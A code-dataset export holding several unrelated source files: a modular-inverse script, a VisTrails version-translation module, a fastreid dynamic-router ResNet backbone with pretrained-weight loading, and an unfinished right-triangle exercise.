seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
38453844732
|
import sys
input = sys.stdin.readline
m = int(input())
x = int(1e9)+7
q = 0
for _ in range(m):
n,s = map(int,input().split())
nInv = pow(n,-1,x)
q = (q + (s*nInv)) % x
print(q)
|
LightPotato99/baekjoon
|
math/modInverse/sigma.py
|
sigma.py
|
py
| 190 |
python
|
en
|
code
| 0 |
github-code
|
6
|
858041514
|
from __future__ import division
import copy
from vistrails.db.versions.v1_0_1.domain import DBVistrail, DBWorkflow, DBLog, \
DBRegistry, DBGroup, DBTag, DBAnnotation, DBAction, IdScope
def translateVistrail(_vistrail):
tag_annotations = {}
notes_annotations = {}
thumb_annotations = {}
upgrade_annotations = {}
prune_annotations = {}
del_tag_annotations = {}
del_notes_annotations = {}
del_thumb_annotations = {}
del_upgrade_annotations = {}
del_prune_annotations = {}
key_lists = {'__tag__': tag_annotations,
'__notes__': notes_annotations,
'__thumb__': thumb_annotations,
'__upgrade__': upgrade_annotations,
'__prune__': prune_annotations}
del_key_lists = {'__tag__': del_tag_annotations,
'__notes__': del_notes_annotations,
'__thumb__': del_thumb_annotations,
'__upgrade__': del_upgrade_annotations,
'__prune__': del_prune_annotations}
_vistrail.update_id_scope()
id_scope = _vistrail.idScope
def update_tags(old_obj, translate_dict):
new_tags = []
for (id, (_, tag, is_new, is_dirty)) in tag_annotations.iteritems():
new_tag = DBTag(id=id, name=tag)
new_tag.is_new = is_new
new_tag.is_dirty = is_dirty
new_tags.append(new_tag)
return new_tags
def update_prune(old_obj, translate_dict):
if old_obj.db_id in prune_annotations:
(_, prune_val, _, _) = prune_annotations[old_obj.db_id]
if prune_val == str(True):
return 1
elif prune_val == str(False):
return 0
return None
def update_annotations(old_obj, translate_dict):
new_annotations = [DBAnnotation.update_version(a, translate_dict)
for a in old_obj.db_annotations]
if old_obj.db_id in notes_annotations:
(id, notes, is_new, is_dirty) = notes_annotations[old_obj.db_id]
ann = DBAnnotation(id=id,
key='__notes__',
value=notes)
ann.is_new = is_new
ann.is_dirty = is_dirty
new_annotations.append(ann)
if old_obj.db_id in upgrade_annotations:
(id, upgrade, is_new, is_dirty) = \
upgrade_annotations[old_obj.db_id]
ann = DBAnnotation(id=id,
key='__upgrade__',
value=upgrade)
ann.is_new = is_new
ann.is_dirty = is_dirty
new_annotations.append(ann)
if old_obj.db_id in thumb_annotations:
(id, thumb, is_new, is_dirty) = thumb_annotations[old_obj.db_id]
ann = DBAnnotation(id=id,
key='__thumb__',
value=thumb)
ann.is_new = is_new
ann.is_dirty = is_dirty
new_annotations.append(ann)
return new_annotations
def update_actions(old_obj, translate_dict):
new_actions = []
for action in old_obj.db_actions:
if action.db_id in del_notes_annotations:
(id, notes, is_new, is_dirty) = \
del_notes_annotations[action.db_id]
ann = DBAnnotation(id=id,
key='__notes__',
value=notes)
ann.is_new = is_new
ann.is_dirty = is_dirty
action.db_deleted_annotations.append(ann)
if action.db_id in del_upgrade_annotations:
(id, upgrade, is_new, is_dirty) = \
del_upgrade_annotations[action.db_id]
ann = DBAnnotation(id=id,
key='__upgrade__',
value=upgrade)
ann.is_new = is_new
ann.is_dirty = is_dirty
action.db_deleted_annotations.append(ann)
if action.db_id in del_thumb_annotations:
(id, thumb, is_new, is_dirty) = \
del_thumb_annotations[action.db_id]
ann = DBAnnotation(id=id,
key='__thumb__',
value=thumb)
ann.is_new = is_new
ann.is_dirty = is_dirty
action.db_deleted_annotations.append(ann)
new_actions.append(DBAction.update_version(action, translate_dict))
return new_actions
def update_workflow(old_obj, translate_dict):
return DBWorkflow.update_version(old_obj.db_workflow, translate_dict)
for a in _vistrail.db_actionAnnotations:
if a.db_key in key_lists:
key_lists[a.db_key][a.db_action_id] = \
(a.db_id, a.db_value, a.is_new, a.is_dirty)
for a in _vistrail.db_deleted_actionAnnotations:
if a.db_key in del_key_lists:
del_key_lists[a.db_key][a.db_action_id] = \
(a.db_id, a.db_value, a.is_new, a.is_dirty)
translate_dict = {'DBGroup': {'workflow': update_workflow},
'DBVistrail': {'tags': update_tags,
'actions': update_actions},
'DBAction': {'annotations': update_annotations,
'prune': update_prune}}
vistrail = DBVistrail.update_version(_vistrail, translate_dict)
for (id, (_, tag, is_new, is_dirty)) in del_tag_annotations.iteritems():
new_tag = DBTag(id=id, name=tag)
new_tag.is_new = is_new
new_tag.is_dirty = is_dirty
vistrail.db_deleted_tags.append(new_tag)
vistrail.db_version = '1.0.1'
return vistrail
def translateWorkflow(_workflow):
def update_workflow(old_obj, translate_dict):
return DBWorkflow.update_version(old_obj.db_workflow, translate_dict)
translate_dict = {'DBGroup': {'workflow': update_workflow}}
workflow = DBWorkflow.update_version(_workflow, translate_dict)
workflow.db_version = '1.0.1'
return workflow
def translateLog(_log):
translate_dict = {}
log = DBLog.update_version(_log, translate_dict)
log.db_version = '1.0.1'
return log
def translateRegistry(_registry):
translate_dict = {}
registry = DBRegistry.update_version(_registry, translate_dict)
registry.db_version = '1.0.1'
return registry
|
VisTrails/VisTrails
|
vistrails/db/versions/v1_0_1/translate/v1_0_2.py
|
v1_0_2.py
|
py
| 6,533 |
python
|
en
|
code
| 100 |
github-code
|
6
|
457427877
|
# encoding: utf-8
"""
@author: liaoxingyu
@contact: [email protected]
"""
import logging
import math
from collections import OrderedDict
import torch
from torch import nn
import torch.nn.functional as F
from torch.autograd.variable import Variable
from fastreid.modeling.ops import MetaConv2d, MetaLinear, MetaBNNorm, MetaINNorm, MetaIBNNorm, MetaGate
from fastreid.layers import (
IBN,
SELayer,
Non_local,
get_norm,
)
from fastreid.utils.checkpoint import get_missing_parameters_message, get_unexpected_parameters_message
from .build import BACKBONE_REGISTRY
from fastreid.utils import comm
K = 4
logger = logging.getLogger(__name__)
model_urls = {
'18x': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'34x': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'50x': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'101x': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'ibn_18x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/resnet18_ibn_a-2f571257.pth',
'ibn_34x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/resnet34_ibn_a-94bc1577.pth',
'ibn_50x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/resnet50_ibn_a-d9d0bb7b.pth',
'ibn_101x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/resnet101_ibn_a-59ea0ac6.pth',
'se_ibn_101x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/se_resnet101_ibn_a-fabed4e2.pth',
}
def repackage_hidden(h):
if type(h) == Variable:
return Variable(h.data)
else:
return tuple(repackage_hidden(v) for v in h)
class Sequential_ext(nn.Module):
"""A Sequential container extended to also propagate the gating information
that is needed in the target rate loss.
"""
def __init__(self, *args):
super(Sequential_ext, self).__init__()
if len(args) == 1 and isinstance(args[0], OrderedDict):
for key, module in args[0].items():
self.add_module(key, module)
else:
for idx, module in enumerate(args):
self.add_module(str(idx), module)
def __getitem__(self, idx):
if not (-len(self) <= idx < len(self)):
raise IndexError('index {} is out of range'.format(idx))
if idx < 0:
idx += len(self)
it = iter(self._modules.values())
for i in range(idx):
next(it)
return next(it)
def __len__(self):
return len(self._modules)
def forward(self, input, opt=None):
for i, module in enumerate(self._modules.values()):
input = module(input, opt)
return input
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, bn_norm, with_ibn=False, with_se=False,
stride=1, downsample=None, reduction=16):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
if with_ibn:
self.bn1 = IBN(planes, bn_norm)
else:
self.bn1 = get_norm(bn_norm, planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = get_norm(bn_norm, planes)
self.relu = nn.ReLU(inplace=True)
if with_se:
self.se = SELayer(planes, reduction)
else:
self.se = nn.Identity()
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.se(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class MetaSELayer(nn.Module):
def __init__(self, channel, reduction=16):
super(MetaSELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc1 = MetaLinear(channel, int(channel / reduction), bias=False)
self.relu = nn.ReLU()
self.fc2 = MetaLinear(int(channel / reduction), channel, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x, opt=None):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.relu(self.fc1(y, opt))
y = self.sigmoid(self.fc2(y, opt)).view(b, c, 1, 1)
return x * y.expand_as(x)
class Bottleneck2(nn.Module):
expansion = 4*K
def __init__(self, inplanes, planes, bn_norm, with_ibn=False, with_se=False,
stride=1, downsample=None, reduction=16):
super(Bottleneck2, self).__init__()
self.conv1 = MetaConv2d(inplanes * K, planes, kernel_size=1, bias=False, groups=K)
if with_ibn:
self.bn1 = MetaIBNNorm(planes)
else:
self.bn1 = MetaBNNorm(planes)
self.conv2 = MetaConv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False, groups=K)
self.bn2 = MetaBNNorm(planes)
self.conv3 = MetaConv2d(planes, planes * self.expansion, kernel_size=1, bias=False, groups=K)
self.bn3 = MetaBNNorm(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
if with_se:
self.se = SELayer(planes * self.expansion, reduction)
else:
self.se = nn.Identity()
self.downsample = downsample
self.stride = stride
def forward(self, x, opt=None):
residual = x
out = self.conv1(x, opt)
out = self.bn1(out, opt)
out = self.relu(out)
out = self.conv2(out, opt)
out = self.bn2(out, opt)
out = self.relu(out)
out = self.conv3(out, opt)
out = self.bn3(out, opt)
out = self.se(out)
if self.downsample is not None:
residual = self.downsample(x, opt)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, bn_norm, with_ibn=False, with_se=False,
stride=1, downsample=None, reduction=16):
super(Bottleneck, self).__init__()
if bn_norm == 'IN':
norm = MetaINNorm
else:
norm = MetaBNNorm
self.conv1 = MetaConv2d(inplanes, planes, kernel_size=1, bias=False)
if with_ibn:
self.bn1 = MetaIBNNorm(planes)
else:
self.bn1 = norm(planes)
self.conv2 = MetaConv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = norm(planes)
self.conv3 = MetaConv2d(planes, planes * self.expansion, kernel_size=1, bias=False)
self.bn3 = norm(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
if with_se:
self.se = SELayer(planes * self.expansion, reduction)
else:
self.se = nn.Identity()
self.downsample = downsample
self.stride = stride
def forward(self, x, opt=None):
residual = x
out = self.conv1(x, opt)
out = self.bn1(out, opt)
out = self.relu(out)
out = self.conv2(out, opt)
out = self.bn2(out, opt)
out = self.relu(out)
out = self.conv3(out, opt)
out = self.bn3(out, opt)
out = self.se(out)
if self.downsample is not None:
residual = self.downsample(x, opt)
out += residual
out = self.relu(out)
return out
class Identity(nn.Module):
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x, None
class HyperRouter(nn.Module):
def __init__(self, planes):
super().__init__()
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.planes = planes
self.fc1 = MetaLinear(planes, planes//16)
self.fc2 = MetaLinear(planes//16, planes*K)
self.fc_classifier = MetaLinear(planes*K, 3)
self.relu = nn.ReLU()
self.softmax = nn.Softmax(-1)
def forward(self, x, opt=None):
x = self.avgpool(x).squeeze(-1).squeeze(-1)
weight = self.relu(F.normalize(self.fc1(x, opt), 2, -1))
weight = self.fc2(weight, opt).reshape(-1, self.planes, K)
domain_cls_logits = self.fc_classifier(weight.reshape(-1, self.planes*K), opt)
x = self.softmax(torch.einsum('bi,bil->bl', x, weight))
return x, domain_cls_logits
class ResNet(nn.Module):
def __init__(self, last_stride, bn_norm, with_ibn, with_se, with_nl, block, layers, non_layers):
self.inplanes = 64
super().__init__()
self.conv1 = MetaConv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = MetaBNNorm(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)
self.layer1 = self._make_layer(block, 64, layers[0]-1, 1, bn_norm, with_ibn, with_se)
self.adaptor1_base = block(256, 64, 'IN', False, with_se)
self.adaptor1_sub = Bottleneck2(256, 64, bn_norm, with_ibn, with_se)
self.router1 = HyperRouter(256)
self.invariant_norm1 = MetaBNNorm(256)
self.specific_norm1 = MetaBNNorm(256)
self.meta_fuse1 = MetaGate(256)
self.meta_se1 = MetaSELayer(256)
self.map1 = MetaBNNorm(256, bias_freeze=True)
self.layer2 = self._make_layer(block, 128, layers[1]-1, 2, bn_norm, with_ibn, with_se)
self.adaptor2_base = block(512, 128, 'IN', False, with_se)
self.adaptor2_sub = Bottleneck2(512, 128, bn_norm, with_ibn, with_se)
self.router2 = HyperRouter(512)
self.invariant_norm2 = MetaBNNorm(512)
self.specific_norm2 = MetaBNNorm(512)
self.meta_fuse2 = MetaGate(512)
self.meta_se2 = MetaSELayer(512)
self.map2 = MetaBNNorm(512, bias_freeze=True)
self.layer3 = self._make_layer(block, 256, layers[2]-1, 2, bn_norm, with_ibn, with_se)
self.adaptor3_base = block(1024, 256, 'IN', False, with_se)
self.adaptor3_sub = Bottleneck2(1024, 256, bn_norm, with_ibn, with_se)
self.router3 = HyperRouter(1024)
self.invariant_norm3 = MetaBNNorm(1024)
self.specific_norm3 = MetaBNNorm(1024)
self.meta_fuse3 = MetaGate(1024)
self.meta_se3 = MetaSELayer(1024)
self.map3 = MetaBNNorm(1024, bias_freeze=True)
self.layer4 = self._make_layer(block, 512, layers[3]-1, last_stride, bn_norm, with_se=with_se)
self.adaptor4_base = block(2048, 512, 'IN', False, with_se)
self.adaptor4_sub = Bottleneck2(2048, 512, bn_norm, with_ibn, with_se)
self.router4 = HyperRouter(2048)
self.invariant_norm4 = MetaBNNorm(2048)
self.specific_norm4 = MetaBNNorm(2048)
self.meta_fuse4 = MetaGate(2048)
self.meta_se4 = MetaSELayer(2048)
self.map4 = MetaBNNorm(2048, bias_freeze=True)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# Standard Params
self.softmax = nn.Softmax(1)
self.sigmoid = nn.Sigmoid()
self.relu = nn.ReLU()
self.random_init()
# fmt: off
if with_nl: self._build_nonlocal(layers, non_layers, bn_norm)
else: self.NL_1_idx = self.NL_2_idx = self.NL_3_idx = self.NL_4_idx = []
# fmt: on
def _make_layer(self, block, planes, blocks, stride=1, bn_norm="BN", with_ibn=False, with_se=False):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = Sequential_ext(
MetaConv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
MetaBNNorm(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, bn_norm, with_ibn, with_se, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, bn_norm, with_ibn, with_se))
return nn.Sequential(*layers)
def _build_nonlocal(self, layers, non_layers, bn_norm):
self.NL_1 = nn.ModuleList(
[Non_local(256, bn_norm) for _ in range(non_layers[0])])
self.NL_1_idx = sorted([layers[0] - (i + 1) for i in range(non_layers[0])])
self.NL_2 = nn.ModuleList(
[Non_local(512, bn_norm) for _ in range(non_layers[1])])
self.NL_2_idx = sorted([layers[1] - (i + 1) for i in range(non_layers[1])])
self.NL_3 = nn.ModuleList(
[Non_local(1024, bn_norm) for _ in range(non_layers[2])])
self.NL_3_idx = sorted([layers[2] - (i + 1) for i in range(non_layers[2])])
self.NL_4 = nn.ModuleList(
[Non_local(2048, bn_norm) for _ in range(non_layers[3])])
self.NL_4_idx = sorted([layers[3] - (i + 1) for i in range(non_layers[3])])
def get_all_conv_layers(self, module):
for m in module:
if isinstance(m, Bottleneck):
for _m in m.modules():
if isinstance(_m, nn.Conv2d):
yield _m
def forward(self, x, epoch, opt=None):
x = self.conv1(x, opt)
x = self.bn1(x, opt)
x = self.relu(x)
x = self.maxpool(x)
weights = []
out_features = []
# layer 1
NL1_counter = 0
if len(self.NL_1_idx) == 0:
self.NL_1_idx = [-1]
for i in range(len(self.layer1)):
x = self.layer1[i](x, opt)
if i == self.NL_1_idx[NL1_counter]:
_, C, H, W = x.shape
x = self.NL_1[NL1_counter](x)
NL1_counter += 1
x_invariant = self.adaptor1_base(x, opt)
N, C, H, W = x_invariant.shape
x_specific = self.adaptor1_sub(x.repeat(1, K, 1, 1), opt).reshape(N, K, C, H, W)
weight, domain_cls_logit = self.router1(x, opt)
weights.append(weight)
x_specific = (x_specific * weight.reshape(-1, K, 1, 1, 1)).sum(1)
x_invariant = self.invariant_norm1(x_invariant, opt)
x_specific = self.specific_norm1(x_specific, opt)
x = self.meta_fuse1(x_invariant, x_specific, opt)
x = self.meta_se1(x, opt)
temp = self.map1(self.avgpool(x), opt)
out_features.append(F.normalize(temp, 2, 1)[..., 0, 0])
# layer 2
NL2_counter = 0
if len(self.NL_2_idx) == 0:
self.NL_2_idx = [-1]
for i in range(len(self.layer2)):
x = self.layer2[i](x, opt)
if i == self.NL_2_idx[NL2_counter]:
_, C, H, W = x.shape
x = self.NL_2[NL2_counter](x)
NL2_counter += 1
x_invariant = self.adaptor2_base(x, opt)
N, C, H, W = x_invariant.shape
x_specific = self.adaptor2_sub(x.repeat(1, K, 1, 1), opt).reshape(N, K, C, H, W)
weight, domain_cls_logit = self.router2(x, opt)
weights.append(weight)
x_specific = (x_specific * weight.reshape(-1, K, 1, 1, 1)).sum(1)
x_invariant = self.invariant_norm2(x_invariant, opt)
x_specific = self.specific_norm2(x_specific, opt)
x = self.meta_fuse2(x_invariant, x_specific, opt)
x = self.meta_se2(x, opt)
temp = self.map2(self.avgpool(x), opt)
out_features.append(F.normalize(temp, 2, 1)[..., 0, 0])
# layer 3
NL3_counter = 0
if len(self.NL_3_idx) == 0:
self.NL_3_idx = [-1]
for i in range(len(self.layer3)):
x = self.layer3[i](x, opt)
if i == self.NL_3_idx[NL3_counter]:
_, C, H, W = x.shape
x = self.NL_3[NL3_counter](x)
NL3_counter += 1
x_invariant = self.adaptor3_base(x, opt)
N, C, H, W = x_invariant.shape
x_specific = self.adaptor3_sub(x.repeat(1, K, 1, 1), opt).reshape(N, K, C, H, W)
weight, domain_cls_logit = self.router3(x, opt)
weights.append(weight)
x_specific = (x_specific * weight.reshape(-1, K, 1, 1, 1)).sum(1)
x_invariant = self.invariant_norm3(x_invariant, opt)
x_specific = self.specific_norm3(x_specific, opt)
x = self.meta_fuse3(x_invariant, x_specific, opt)
x = self.meta_se3(x, opt)
temp = self.map3(self.avgpool(x), opt)
out_features.append(F.normalize(temp, 2, 1)[..., 0, 0])
# layer 4
NL4_counter = 0
if len(self.NL_4_idx) == 0:
self.NL_4_idx = [-1]
for i in range(len(self.layer4)):
x = self.layer4[i](x, opt)
if i == self.NL_4_idx[NL4_counter]:
_, C, H, W = x.shape
x = self.NL_4[NL4_counter](x)
NL4_counter += 1
x_invariant = self.adaptor4_base(x, opt)
N, C, H, W = x_invariant.shape
x_specific = self.adaptor4_sub(x.repeat(1, K, 1, 1), opt).reshape(N, K, C, H, W)
weight, domain_cls_logit = self.router4(x, opt)
weights.append(weight)
x_specific = (x_specific * weight.reshape(-1, K, 1, 1, 1)).sum(1)
x_invariant = self.invariant_norm4(x_invariant, opt)
x_specific = self.specific_norm4(x_specific, opt)
x = self.meta_fuse4(x_invariant, x_specific, opt)
x = self.meta_se4(x, opt)
temp = self.map4(self.avgpool(x), opt)
out_features.append(F.normalize(temp, 2, 1)[..., 0, 0])
weights = torch.cat(weights, -1)
return x, weights, out_features
def random_init(self):
for name, m in self.named_modules():
if isinstance(m, MetaConv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
nn.init.normal_(m.weight, 0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def init_pretrained_weights(key):
"""Initializes model with pretrained weights.
Layers that don't match with pretrained layers in name or size are kept unchanged.
"""
import os
import errno
import gdown
def _get_torch_home():
ENV_TORCH_HOME = 'TORCH_HOME'
ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
DEFAULT_CACHE_DIR = '~/.cache'
torch_home = os.path.expanduser(
os.getenv(
ENV_TORCH_HOME,
os.path.join(
os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch'
)
)
)
return torch_home
torch_home = _get_torch_home()
model_dir = os.path.join(torch_home, 'checkpoints')
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# Directory already exists, ignore.
pass
else:
# Unexpected OSError, re-raise.
raise
filename = model_urls[key].split('/')[-1]
cached_file = os.path.join(model_dir, filename)
if not os.path.exists(cached_file):
logger.info(f"Pretrain model don't exist, downloading from {model_urls[key]}")
if comm.is_main_process():
gdown.download(model_urls[key], cached_file, quiet=False)
comm.synchronize()
logger.info(f"Loading pretrained model from {cached_file}")
state_dict = torch.load(cached_file, map_location=torch.device('cpu'))
#CHANGE Reduction Version
state_dict = torch.load('/home/pengyi/.cache/torch/checkpoints/resnet50_ibn_a-d9d0bb7b.pth', map_location=torch.device('cpu'))
return state_dict
@BACKBONE_REGISTRY.register()
def build_meta_dynamic_router_resnet_backbone(cfg):
"""
Create a ResNet instance from config.
Returns:
ResNet: a :class:`ResNet` instance.
"""
# fmt: off
pretrain = cfg.MODEL.BACKBONE.PRETRAIN
pretrain_path = cfg.MODEL.BACKBONE.PRETRAIN_PATH
last_stride = cfg.MODEL.BACKBONE.LAST_STRIDE
bn_norm = cfg.MODEL.BACKBONE.NORM
with_ibn = cfg.MODEL.BACKBONE.WITH_IBN
with_se = cfg.MODEL.BACKBONE.WITH_SE
with_nl = cfg.MODEL.BACKBONE.WITH_NL
depth = cfg.MODEL.BACKBONE.DEPTH
# fmt: on
num_blocks_per_stage = {
'18x': [2, 2, 2, 2],
'34x': [3, 4, 6, 3],
'50x': [3, 4, 6, 3],
'101x': [3, 4, 23, 3],
}[depth]
nl_layers_per_stage = {
'18x': [0, 0, 0, 0],
'34x': [0, 0, 0, 0],
'50x': [0, 2, 3, 0],
'101x': [0, 2, 9, 0]
}[depth]
block = {
'18x': BasicBlock,
'34x': BasicBlock,
'50x': Bottleneck,
'101x': Bottleneck
}[depth]
model = ResNet(last_stride, bn_norm, with_ibn, with_se, with_nl, block,
num_blocks_per_stage, nl_layers_per_stage)
if pretrain:
# Load pretrain path if specifically
if pretrain_path:
try:
state_dict = torch.load(pretrain_path, map_location=torch.device('cpu'))
logger.info(f"Loading pretrained model from {pretrain_path}")
except FileNotFoundError as e:
logger.info(f'{pretrain_path} is not found! Please check this path.')
raise e
except KeyError as e:
logger.info("State dict keys error! Please check the state dict.")
raise e
else:
key = depth
if with_ibn: key = 'ibn_' + key
# if with_se: key = 'se_' + key
state_dict = init_pretrained_weights(key)
model_dict = model.state_dict()
for k in model_dict.keys():
if k in state_dict:
v = state_dict[k]
if model_dict[k].shape == v.shape:
model_dict[k] = v
else:
if len(v.shape) == 1:
model_dict[k] = v[:model_dict[k].shape[0]]
elif len(v.shape) == 2:
model_dict[k] = v[:model_dict[k].shape[0], :model_dict[k].shape[1]]
elif len(v.shape) == 3:
model_dict[k] = v[:model_dict[k].shape[0], :model_dict[k].shape[1], :model_dict[k].shape[2]]
elif len(v.shape) == 4:
model_dict[k] = v[:model_dict[k].shape[0], :model_dict[k].shape[1], :model_dict[k].shape[2], :model_dict[k].shape[3]]
elif len(v.shape) == 5:
model_dict[k] = v[:model_dict[k].shape[0], :model_dict[k].shape[1], :model_dict[k].shape[2], :model_dict[k].shape[3], :model_dict[k].shape[4]]
else:
raise Exception
else:
try:
if 'adaptor1_base' in k:
if model_dict[k].shape == state_dict['layer1.2'+k[13:]].shape:
model_dict[k] = state_dict['layer1.2'+k[13:]]
print('Done, adaptor', k)
else:
print('Skip, adaptor', k)
elif 'adaptor1_sub' in k:
if 'conv3' in k:
v = state_dict['layer1.2'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2).repeat(K, 1, 1, 1)
elif 'bn3' in k:
v = state_dict['layer1.2'+k[12:]]
model_dict[k] = v.repeat(K)
elif model_dict[k].shape == state_dict['layer1.2'+k[12:]].shape:
model_dict[k] = state_dict['layer1.2'+k[12:]]
else:
v = state_dict['layer1.2'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2)
print('Done, adaptor', k)
elif 'adaptor2_base' in k:
if model_dict[k].shape == state_dict['layer2.3'+k[13:]].shape:
model_dict[k] = state_dict['layer2.3'+k[13:]]
print('Done, adaptor', k)
else:
print('Skip, adaptor', k)
elif 'adaptor2_sub' in k:
if 'conv3' in k:
v = state_dict['layer2.3'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2).repeat(K, 1, 1, 1)
elif 'bn3' in k:
v = state_dict['layer2.3'+k[12:]]
model_dict[k] = v.repeat(K)
elif model_dict[k].shape == state_dict['layer2.3'+k[12:]].shape:
model_dict[k] = state_dict['layer2.3'+k[12:]]
else:
v = state_dict['layer2.3'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2)
print('Done, adaptor', k)
elif 'adaptor3_base' in k:
if model_dict[k].shape == state_dict['layer3.5'+k[13:]].shape:
model_dict[k] = state_dict['layer3.5'+k[13:]]
print('Done, adaptor', k)
else:
print('Skip, adaptor', k)
elif 'adaptor3_sub' in k:
if 'conv3' in k:
v = state_dict['layer3.5'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2).repeat(K, 1, 1, 1)
elif 'bn3' in k:
v = state_dict['layer3.5'+k[12:]]
model_dict[k] = v.repeat(K)
elif model_dict[k].shape == state_dict['layer3.5'+k[12:]].shape:
model_dict[k] = state_dict['layer3.5'+k[12:]]
else:
v = state_dict['layer3.5'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2)
print('Done, adaptor', k)
elif 'adaptor4_base' in k:
if model_dict[k].shape == state_dict['layer4.2'+k[13:]].shape:
model_dict[k] = state_dict['layer4.2'+k[13:]]
print('Done, adaptor', k)
else:
print('Skip, adaptor', k)
elif 'adaptor4_sub' in k:
if 'conv3' in k:
v = state_dict['layer4.2'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2).repeat(K, 1, 1, 1)
elif 'bn3' in k:
v = state_dict['layer4.2'+k[12:]]
model_dict[k] = v.repeat(K)
elif 'bn1' in k:
if 'IN' in k:
model_dict[k] = state_dict['layer4.2.bn1.'+k.split('.')[-1]][:256]
else:
model_dict[k] = state_dict['layer4.2.bn1.'+k.split('.')[-1]][256:]
elif model_dict[k].shape == state_dict['layer4.2'+k[12:]].shape:
model_dict[k] = state_dict['layer4.2'+k[12:]]
else:
v = state_dict['layer4.2'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2)
print('Done, adaptor', k)
except Exception:
pass
incompatible = model.load_state_dict(model_dict, strict=False)
if incompatible.missing_keys:
logger.info(
get_missing_parameters_message(incompatible.missing_keys)
)
if incompatible.unexpected_keys:
logger.info(
get_unexpected_parameters_message(incompatible.unexpected_keys)
)
return model
|
peterzpy/ACL-DGReID
|
fastreid/modeling/backbones/meta_dynamic_router_resnet.py
|
meta_dynamic_router_resnet.py
|
py
| 29,474 |
python
|
en
|
code
| 8 |
github-code
|
6
|
11878648706
|
'''
Write a program that takes 3 integers as input and checks whether they can form the sides of a right angled triangle or not. Print YES if they can form a right angled triangle. NO, otherwise.
Input Format:
Single line of input contains three numbers
Output Format:
Print YES or NO
Example:
Input:
5 4 3
Output:
YES
Example:
Input:
10 20 30
Output:
NO
'''
a = [int(x) for x in input().split()[:3]]
a.sort()
